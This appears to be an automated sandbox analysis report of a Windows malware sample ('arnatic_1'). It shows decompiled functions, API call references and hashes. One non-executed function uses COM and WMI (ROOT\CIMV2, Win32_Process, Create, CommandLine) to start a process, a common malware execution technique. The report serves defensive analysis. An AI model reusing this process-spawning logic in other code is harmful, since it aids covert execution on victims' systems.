				_t23 = 1;
				_t27 =  *0x40bf2c - _t23; // 0x1
				if(_t27 == 0) {
					_t1 =  &_a4; // 0x402635
					TerminateProcess(GetCurrentProcess(),  *_t1);
				}
				_t16 = _a12;
				 *0x40bf28 = _t23;
				 *0x40bf24 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x40c5d0; // 0x0
					if(_t9 != 0) {
						_t22 =  *0x40c5cc; // 0x0
						_push(_t24);
						_t4 = _t22 - 4; // -4
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x40c5d0; // 0x0
							} while (_t32 >= 0);
						}
					}
					E00403467(0x409018, 0x40901c);
				}
				E00403467(0x409020, 0x409028);
				if(_t16 == 0) {
					_t5 =  &_a4; // 0x402635
					 *0x40bf2c = _t23; // executed
					ExitProcess( *_t5);
				}
				return E0040345E();
			}

0x004033b0
0x004033b1
0x004033b8
0x004033b9
0x004033bf
0x004033c1
0x004033cc
0x004033cc
0x004033d8
0x004033dc
0x004033e2
0x004033e8
0x004033ea
0x004033f1
0x004033f3
0x004033f9
0x004033fa
0x004033fa
0x004033ff
0x00403401
0x00403401
0x00403405
0x00403407
0x00403407
0x00403409
0x0040340c
0x0040340c
0x00403401
0x00403414
0x0040341f
0x00403425
0x00403430
0x0040343a
0x00403443
0x00403447
0x0040344d
0x0040344d
0x00403442

APIs

GetCurrentProcess.KERNEL32(5&@,?,0040339B,00000000,00000000,00000000,00402635,00000000), ref: 004033C5
TerminateProcess.KERNEL32(00000000,?,0040339B,00000000,00000000,00000000,00402635,00000000), ref: 004033CC
ExitProcess.KERNEL32 ref: 0040344D

Strings

5&@, xrefs: 00403443, 004033C1

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID: 5&@
API String ID: 1703294689-1759722717
Opcode ID: f3f6b8826005647df330a249f53c0da5e5088617a60da4b6cf75099d0d2a05b8
Instruction ID: dac933591218d4de6b0b9226b21178a2d908b06494c8db983224985cf0467a1d
Opcode Fuzzy Hash: f3f6b8826005647df330a249f53c0da5e5088617a60da4b6cf75099d0d2a05b8
Instruction Fuzzy Hash: 3B01DB316043119AD612AF69FD8565A7FACEB84711B10803BF440BB1D1DB786D41CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00402564, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x407308);
				_push(E00403DC8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x40befc = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x40bef8 = _t25;
				 *0x40bef4 = _t25 << 8;
				 *0x40bef0 = _t8 >> 0x10;
				if(E00403D62(_t25 << 8, 1) == 0) {
					E00402679(0x1c);
				}
				if(E004031DC() == 0) {
					E00402679(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E00403A31(); // executed
				 *0x40c5d8 = GetCommandLineA();
				 *0x40bee0 = E004038FF();
				E004036B2();
				E004035F9();
				E00403361();
				_t18 =  *0x40bf0c; // 0x20911a0
				 *0x40bf10 = _t18;
				_push(_t18);
				_push( *0x40bf04);
				_v32 = E00402030( *0x40bf00);
				E0040338E(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E00403481(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}

0x00402564
0x00402567
0x00402569
0x0040256e
0x00402579
0x0040257a
0x00402586
0x00402587
0x0040258a
0x00402594
0x0040259c
0x004025a2
0x004025ad
0x004025b6
0x004025c5
0x004025c9
0x004025ce
0x004025d6
0x004025da
0x004025df
0x004025e0
0x004025e4
0x004025ef
0x004025f9
0x004025fe
0x00402603
0x00402608
0x0040260d
0x00402612
0x00402617
0x00402618
0x0040262c
0x00402630
0x0040263c
0x00402648

APIs

GetVersion.KERNEL32 ref: 0040258A

Part of subcall function 00403D62: HeapCreate.KERNELBASE(00000000,00001000,00000000,004025C2,00000001), ref: 00403D73
Part of subcall function 00403D62: HeapDestroy.KERNEL32 ref: 00403DB2

GetCommandLineA.KERNEL32 ref: 004025E9

Part of subcall function 00402679: ExitProcess.KERNEL32 ref: 00402696

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: Heap$CommandCreateDestroyExitLineProcessVersion
String ID:
API String ID: 1387771204-0
Opcode ID: ce562f033d09dbba23b63a2f5765e573942c0ab654e6daec3420a956dc918cbf
Instruction ID: 2bdec769628442fe55c573d7657a62ba510fb4e64b8abb4e87b71dbdd2ed5c1d
Opcode Fuzzy Hash: ce562f033d09dbba23b63a2f5765e573942c0ab654e6daec3420a956dc918cbf
Instruction Fuzzy Hash: AC21A471940606AFD708AF76DE06B693BA9EB04305F10453FFA00B63E1DB7D55409B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403D62, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403D62(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x40c4a4 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E00403C1A(_t12, _t15);
					 *0x40c4a8 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E00404A09();
							goto L5;
						}
					} else {
						_t10 = E004041B8(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x40c4a4);
							goto L7;
						}
					}
				}
			}

0x00403d62
0x00403d73
0x00403d79
0x00403d7b
0x00403d80
0x00403db8
0x00403dba
0x00403d82
0x00403d82
0x00403d8a
0x00403d8f
0x00403d9e
0x00403da1
0x00000000
0x00403da3
0x00403da3
0x00000000
0x00403da3
0x00403d91
0x00403d96
0x00403da8
0x00403daa
0x00403dbb
0x00403dbd
0x00403dbe
0x00403dac
0x00403db2
0x00000000
0x00403db2
0x00403daa
0x00403d8f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004025C2,00000001), ref: 00403D73

Part of subcall function 00403C1A: GetVersionExA.KERNEL32 ref: 00403C39

HeapDestroy.KERNEL32 ref: 00403DB2

Part of subcall function 004041B8: HeapAlloc.KERNEL32(00000000,00000140,00403D9B,000003F8), ref: 004041C5

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 3b76104dc4108d18dc1d886e2068e0ecc8e279359f4da77b9a823940b71bb11f
Instruction ID: 5fd0e70cf170851146f21f4e2e200082abee5c3343f552cfe57ef7db52d193ab
Opcode Fuzzy Hash: 3b76104dc4108d18dc1d886e2068e0ecc8e279359f4da77b9a823940b71bb11f
Instruction Fuzzy Hash: 9FF030B0A55302E9EB505F315E4577A399CAF80756F10453BF504F82D1EBB88680951A

Uniqueness

Uniqueness Score: -1.00%

Function 00402875, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E00402875(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x407358);
				_push(E00403DC8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x40c4a8; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x40b2f4; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E00404055(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00404D01(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E0040293B();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x40c4a0; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x40c4a4); // executed
					} else {
						E00404055(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00404554();
						_v8 = _v8 | 0xffffffff;
						E004028DC();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

0x00402878
0x0040287a
0x0040287f
0x0040288a
0x0040288b
0x00402898
0x004028a0
0x004028e5
0x004028e8
0x00000000
0x004028ea
0x004028ea
0x004028ed
0x004028ef
0x004028fb
0x004028f1
0x004028f1
0x004028f4
0x004028f4
0x004028fc
0x004028ff
0x00402905
0x00402935
0x00402935
0x00000000
0x00402907
0x00402909
0x0040290e
0x0040290f
0x00402922
0x00402925
0x00402929
0x0040292e
0x00402931
0x00402933
0x00000000
0x00000000
0x00402933
0x00402905
0x004028a2
0x004028a2
0x004028a5
0x004028ab
0x00402944
0x00402944
0x00402947
0x00402949
0x0040294d
0x0040294d
0x00402951
0x00402951
0x00402953
0x00402954
0x00402954
0x0040295c
0x004028b1
0x004028b3
0x004028b9
0x004028bd
0x004028c4
0x004028c7
0x004028cb
0x004028d0
0x004028d5
0x00000000
0x00000000
0x004028d7
0x004028d5
0x004028ab
0x00402965
0x00402970

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0040295C

Part of subcall function 00404055: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0040548B,00000009,00000000,00000000,00000001,00403268,00000001,00000074,?,?,00000000,00000001), ref: 00404092
Part of subcall function 00404055: EnterCriticalSection.KERNEL32(?,?,?,0040548B,00000009,00000000,00000000,00000001,00403268,00000001,00000074,?,?,00000000,00000001), ref: 004040AD

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 1f34889502ccb582b8905ac3b01c9f1d02720423586468523cc82713e0ded054
Instruction ID: 1aaf52c8326359188d463a71f81fec4ca45521bdfbff81e2303a370d4c7941dd
Opcode Fuzzy Hash: 1f34889502ccb582b8905ac3b01c9f1d02720423586468523cc82713e0ded054
Instruction Fuzzy Hash: 4A219772A00605ABDB10EF659E4AB9E7764EB01724F144237F524FB2D0C7BC9941965C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401020, Relevance: 86.2, APIs: 24, Strings: 25, Instructions: 468
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E00401020() {
				intOrPtr _v16;
				char _v44;
				intOrPtr _v52;
				signed int _v64;
				char _v100;
				char _v140;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				char _v180;
				WCHAR* _v188;
				char _v200;
				char _v204;
				intOrPtr _v216;
				char _v224;
				intOrPtr _v232;
				char _v244;
				char _v252;
				intOrPtr _v256;
				intOrPtr* _v260;
				void* _v264;
				char _v268;
				intOrPtr _v276;
				char _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				char _v296;
				intOrPtr _v300;
				intOrPtr* _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v336;
				intOrPtr* _v340;
				char _v344;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr* _v392;
				char _v400;
				char _v408;
				signed int _v412;
				signed int _v416;
				char _v424;
				intOrPtr* _v428;
				intOrPtr* _v436;
				char _v444;
				void* _v448;
				intOrPtr* _v456;
				intOrPtr* _v464;
				intOrPtr* _v468;
				intOrPtr* _v472;
				intOrPtr* _v476;
				intOrPtr* _v484;
				intOrPtr* _v496;
				intOrPtr* _v500;
				intOrPtr _t173;
				char* _t175;
				intOrPtr* _t176;
				intOrPtr _t178;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t181;
				intOrPtr* _t183;
				intOrPtr* _t187;
				intOrPtr* _t189;
				intOrPtr* _t191;
				intOrPtr* _t196;
				intOrPtr* _t198;
				intOrPtr* _t200;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				intOrPtr* _t209;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr* _t239;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				intOrPtr* _t249;
				void* _t265;
				intOrPtr* _t271;
				signed int _t324;
				signed int _t325;
				intOrPtr _t327;
				void* _t328;
				intOrPtr* _t332;
				WCHAR* _t333;
				intOrPtr* _t335;
				intOrPtr* _t336;
				intOrPtr* _t337;
				intOrPtr* _t338;
				intOrPtr* _t339;
				intOrPtr* _t340;
				void* _t341;
				intOrPtr _t343;
				intOrPtr _t344;
				void* _t345;

				_t173 =  *[fs:0x0];
				 *[fs:0x0] = _t344;
				_t345 = _t344 - 0xc4;
				_v176 = 0;
				__imp__CoInitialize(0, _t265, _t173, E00406F75, 0xffffffff);
				if(_t173 >= 0) {
					_t325 = _t324 | 0xffffffff;
					__imp__CoInitializeSecurity(0, _t325, 0, 0, 0, 3, 0, 0, 0, _t324, _t328, _t341);
					if(_t173 >= 0) {
						_v244 = 0;
						_t175 =  &_v244;
						_v44 = 0;
						__imp__CoCreateInstance(0x407248, 0, 1, 0x409034, _t175);
						if(_t175 < 0) {
							L44:
							_v64 = _t325;
							goto L68;
						} else {
							_v268 = 0;
							_v64 = 1;
							_v180 = 0x4f0052;
							_v176 = 0x54004f;
							_v172 = 0x43005c;
							_v168 = 0x4d0049;
							_v164 = 0x320056;
							_v160 = 0;
							_t178 = E0040213E(0xc);
							_t345 = _t345 + 4;
							_v232 = _t178;
							_v64 = 2;
							if(_t178 == 0) {
								_t179 = 0;
							} else {
								_t179 = E00401800(_t178, _t178,  &_v180);
							}
							_v64 = 1;
							_v260 = _t179;
							if(_t179 == 0) {
								E00402060(0x8007000e);
								_t179 = _v264;
							}
							_v64 = 3;
							if(_t179 == 0) {
								_t180 = 0;
							} else {
								_t180 =  *_t179;
							}
							_t271 = _v264;
							_t181 =  *((intOrPtr*)( *_t271 + 0xc))(_t271, _t180, 0, 0, 0, 0, 0, 0,  &_v268);
							E004017B0( &_v296);
							_t183 = _v304;
							if(_t181 < 0) {
								L42:
								_v100 = 0;
								if(_t183 != 0) {
									 *((intOrPtr*)( *_t183 + 8))(_t183);
								}
								goto L44;
							} else {
								__imp__CoSetProxyBlanket(_t183, 0xa, 0, 0, 3, 3, 0, 0);
								if(_t183 < 0) {
									_t183 = _v336;
									goto L42;
								} else {
									_v308 = 0;
									_v312 = 0;
									_v320 = 0;
									_t332 = __imp__#2;
									_v264 = 0x720043;
									_v260 = 0x610065;
									_v256 = 0x650074;
									_v252 = 0;
									_v176 = 0x690057;
									_v172 = 0x33006e;
									_v168 = 0x5f0032;
									_v164 = 0x720050;
									_v160 = 0x63006f;
									_v156 = 0x730065;
									_v152 = 0x73;
									_t327 =  *_t332( &_v264);
									_v304 = _t327;
									_t343 =  *_t332( &_v180);
									_v156 = _t343;
									_t187 = _v344;
									_v140 = 8;
									 *((intOrPtr*)( *_t187 + 0x18))(_t187, _t343, 0, 0,  &_v316, 0);
									_t189 = _v340;
									 *((intOrPtr*)( *_t189 + 0x4c))(_t189, _t327, 0,  &_v344, 0);
									_t191 = _v364;
									 *((intOrPtr*)( *_t191 + 0x3c))(_t191, 0,  &_v372);
									_v392 =  *_t332(_v188);
									_t333 = _v188;
									_v200 = 9;
									if(_t333 != 0) {
										_push(lstrlenW(0x409030));
										E004016B0(0x409030);
										_push(lstrlenW(_t333));
										_t194 = E004016B0(_t333);
									}
									_v364 = 0;
									E00401760(_t194,  &_v364, _v392);
									_t196 = _v392;
									_v296 = 0x6f0043;
									_v292 = 0x6d006d;
									_v288 = 0x6e0061;
									_v284 = 0x4c0064;
									_v280 = 0x6e0069;
									_v276 = 0x65;
									_v204 = 0xa;
									 *((intOrPtr*)( *_t196 + 0x14))(_t196,  &_v296, 0,  &_v368, 0);
									_v408 = 0;
									_t198 = _v428;
									_push(0);
									_push( &_v408);
									_push(_v412);
									_push(0);
									_push(0);
									_push(_t327);
									_push(_t343);
									_push(_t198);
									_v224 = 0xb;
									if( *((intOrPtr*)( *_t198 + 0x60))() < 0) {
										_t200 = _v436;
										_v252 = 0xa;
										if(_t200 != 0) {
											 *((intOrPtr*)( *_t200 + 8))(_t200);
										}
										__imp__#9( &_v416);
										_t335 = __imp__#6;
										 *_t335(_v448);
										 *_t335(_t343);
										 *_t335(_t327);
										_t205 = _v456;
										_v268 = 5;
										if(_t205 != 0) {
											 *((intOrPtr*)( *_t205 + 8))(_t205);
										}
										_t206 = _v448;
										_v268 = 4;
										if(_t206 != 0) {
											 *((intOrPtr*)( *_t206 + 8))(_t206);
										}
										_t207 = _v444;
										_v268 = 1;
										if(_t207 != 0) {
											 *((intOrPtr*)( *_t207 + 8))(_t207);
										}
										_t208 = _v472;
										_v268 = 0;
										if(_t208 != 0) {
											 *((intOrPtr*)( *_t208 + 8))(_t208);
										}
										_t209 = _v468;
										_v268 = 0xffffffff;
										if(_t209 != 0) {
											 *((intOrPtr*)( *_t209 + 8))(_t209);
										}
									} else {
										_v400 = 0;
										_v252 = 0xc;
										_v320 = 0x650052;
										_v316 = 0x750074;
										_v312 = 0x6e0072;
										_v308 = 0x610056;
										_v304 = 0x75006c;
										_v300 = 0x65;
										_t216 = E0040213E(0xc);
										_t345 = _t345 + 4;
										_v448 = _t216;
										_v252 = 0xd;
										if(_t216 == 0) {
											_t336 = 0;
										} else {
											_t336 = E00401800(_t216, _t216,  &_v320);
										}
										_v252 = 0xc;
										_v264 = _t336;
										if(_t336 == 0) {
											E00402060(0x8007000e);
										}
										_v252 = 0xe;
										if(_t336 == 0) {
											_v448 = 0;
										} else {
											_v448 =  *_t336;
										}
										_t217 = _v436;
										_v472 =  *((intOrPtr*)( *_t217 + 0x10))(_t217, _v448, 0,  &_v400, 0, 0);
										if(_t336 != 0) {
											E00401840(_t336);
										}
										if(_v472 < 0 || (_v416 | _v412) != 0) {
											_t337 = __imp__#9;
											 *_t337( &_v424);
											_t221 = _v464;
											_v280 = 0xa;
											if(_t221 != 0) {
												 *((intOrPtr*)( *_t221 + 8))(_t221);
											}
											 *_t337( &_v444);
											_t338 = __imp__#6;
											 *_t338(_v476);
											 *_t338(_t343);
											 *_t338(_t327);
											_t227 = _v484;
											_v296 = 5;
											if(_t227 != 0) {
												 *((intOrPtr*)( *_t227 + 8))(_t227);
											}
											_t228 = _v476;
											_v296 = 4;
											if(_t228 != 0) {
												 *((intOrPtr*)( *_t228 + 8))(_t228);
											}
											_t229 = _v472;
											_v296 = 1;
											if(_t229 != 0) {
												 *((intOrPtr*)( *_t229 + 8))(_t229);
											}
											_t230 = _v500;
											_v296 = 0;
											if(_t230 != 0) {
												 *((intOrPtr*)( *_t230 + 8))(_t230);
											}
											_v296 = 0xffffffff;
											L68:
											_t176 = _v264;
											if(_t176 != 0) {
												 *((intOrPtr*)( *_t176 + 8))(_t176);
											}
										} else {
											_t339 = __imp__#9;
											_v448 = 1;
											 *_t339( &_v424);
											_t239 = _v464;
											_v280 = 0xa;
											if(_t239 != 0) {
												 *((intOrPtr*)( *_t239 + 8))(_t239);
											}
											 *_t339( &_v444);
											_t340 = __imp__#6;
											 *_t340(_v476);
											 *_t340(_t343);
											 *_t340(_t327);
											_t245 = _v484;
											_v296 = 5;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 = _v476;
											_v296 = 4;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 = _v472;
											_v296 = 1;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											_t248 = _v500;
											_v296 = 0;
											if(_t248 != 0) {
												 *((intOrPtr*)( *_t248 + 8))(_t248);
											}
											_t249 = _v496;
											_v296 = 0xffffffff;
											if(_t249 != 0) {
												 *((intOrPtr*)( *_t249 + 8))(_t249);
											}
										}
									}
								}
							}
						}
					}
					__imp__CoUninitialize();
					 *[fs:0x0] = _v52;
					return _v216;
				} else {
					 *[fs:0x0] = _v16;
					return 0;
				}
			}

0x00401027
0x0040102e
0x00401035
0x0040103f
0x00401043
0x0040104b
0x0040106f
0x00401075
0x0040107d
0x00401083
0x00401087
0x0040108b
0x004010a0
0x004010a8
0x00401514
0x00401514
0x00000000
0x004010ae
0x004010ae
0x004010b4
0x004010bc
0x004010c4
0x004010cc
0x004010d4
0x004010dc
0x004010e4
0x004010eb
0x004010f0
0x004010f3
0x004010f9
0x00401101
0x00401111
0x00401103
0x0040110a
0x0040110a
0x00401115
0x0040111d
0x00401121
0x00401128
0x0040112d
0x0040112d
0x00401133
0x0040113b
0x00401141
0x0040113d
0x0040113d
0x0040113d
0x00401143
0x00401156
0x0040115f
0x00401164
0x0040116a
0x00401503
0x00401505
0x0040150c
0x00401511
0x00401511
0x00000000
0x00401170
0x0040117b
0x00401183
0x004014ff
0x00000000
0x00401189
0x00401189
0x0040118d
0x00401191
0x00401195
0x004011a0
0x004011a8
0x004011b0
0x004011b8
0x004011bc
0x004011c7
0x004011d2
0x004011dd
0x004011e8
0x004011f3
0x004011fe
0x0040120b
0x0040120d
0x0040121b
0x0040121d
0x00401224
0x00401234
0x0040123c
0x0040123f
0x0040124e
0x00401251
0x0040125e
0x0040126b
0x0040126f
0x00401276
0x00401280
0x0040128d
0x00401297
0x004012a3
0x004012a9
0x004012a9
0x004012b2
0x004012bc
0x004012c1
0x004012d7
0x004012e2
0x004012ed
0x004012f8
0x00401303
0x0040130e
0x0040131a
0x00401322
0x00401325
0x00401329
0x00401331
0x00401332
0x00401339
0x0040133a
0x0040133b
0x0040133c
0x0040133d
0x0040133e
0x0040133f
0x0040134c
0x00401520
0x00401524
0x0040152e
0x00401533
0x00401533
0x0040153b
0x00401545
0x0040154c
0x0040154f
0x00401552
0x00401554
0x00401558
0x00401562
0x00401567
0x00401567
0x0040156a
0x0040156e
0x00401578
0x0040157d
0x0040157d
0x00401580
0x00401584
0x0040158e
0x00401593
0x00401593
0x00401596
0x0040159a
0x004015a3
0x004015a8
0x004015a8
0x004015ab
0x004015af
0x004015bc
0x004015c5
0x004015c5
0x00401352
0x00401352
0x00401359
0x00401361
0x0040136c
0x00401377
0x00401382
0x0040138d
0x00401398
0x0040139f
0x004013a4
0x004013a7
0x004013ad
0x004013b5
0x004013ca
0x004013b7
0x004013c6
0x004013c6
0x004013ce
0x004013d6
0x004013dd
0x004013e4
0x004013e4
0x004013eb
0x004013f3
0x004013fd
0x004013f5
0x004013f7
0x004013f7
0x00401401
0x0040141a
0x0040141e
0x00401422
0x00401422
0x0040142b
0x004015cd
0x004015d8
0x004015da
0x004015de
0x004015e8
0x004015ed
0x004015ed
0x004015f5
0x004015fb
0x00401602
0x00401605
0x00401608
0x0040160a
0x0040160e
0x00401618
0x0040161d
0x0040161d
0x00401620
0x00401624
0x0040162e
0x00401633
0x00401633
0x00401636
0x0040163a
0x00401644
0x00401649
0x00401649
0x0040164c
0x00401650
0x00401659
0x0040165e
0x0040165e
0x00401661
0x0040166c
0x0040166c
0x00401672
0x00401677
0x00401677
0x00401441
0x00401441
0x0040144c
0x00401454
0x00401456
0x0040145a
0x00401464
0x00401469
0x00401469
0x00401471
0x00401477
0x0040147e
0x00401481
0x00401484
0x00401486
0x0040148a
0x00401494
0x00401499
0x00401499
0x0040149c
0x004014a0
0x004014aa
0x004014af
0x004014af
0x004014b2
0x004014b6
0x004014c0
0x004014c5
0x004014c5
0x004014c8
0x004014cc
0x004014d5
0x004014da
0x004014da
0x004014dd
0x004014e1
0x004014ee
0x004014f7
0x004014f7
0x004014ee
0x0040142b
0x0040134c
0x00401183
0x0040116a
0x004010a8
0x0040167a
0x0040168f
0x0040169c
0x0040104d
0x00401057
0x00401064
0x00401064

APIs

CoInitialize.OLE32(00000000), ref: 00401043
CoInitializeSecurity.OLE32(00000000,00000002,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000002,00000000,00000000), ref: 00401075
CoCreateInstance.OLE32(00407248,00000000,00000001,00409034,?), ref: 004010A0
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0040117B

Strings

t, xrefs: 0040136C
\, xrefs: 004010CC
t, xrefs: 004011B0
d, xrefs: 004012F8
e, xrefs: 004011A8
C, xrefs: 004011A0
l, xrefs: 0040138D
V, xrefs: 004010DC
n, xrefs: 004011C7
2, xrefs: 004011D2
P, xrefs: 004011DD
R, xrefs: 00401361
a, xrefs: 004012ED
V, xrefs: 00401382
W, xrefs: 004011BC
m, xrefs: 004012E2
O, xrefs: 004010C4
s, xrefs: 004011FE
o, xrefs: 004011E8
R, xrefs: 004010BC
C, xrefs: 004012D7
r, xrefs: 00401377
e, xrefs: 004011F3
i, xrefs: 00401303
I, xrefs: 004010D4

Memory Dump Source

Source File: 0000000B.00000002.306743117.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.306712579.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306781878.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.306788186.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306817253.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.306838775.000000000040D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_arnatic_1.jbxd

Similarity

API ID: Initialize$BlanketCreateInstanceProxySecurity
String ID: 2$C$C$I$O$P$R$R$V$V$W$\$a$d$e$e$i$l$m$n$o$r$s$t$t
API String ID: 1719769963-3083329441
Opcode ID: e0bc1bd19a38ab555921701737a41acaf98fd081c86205885e3da69513b1436d
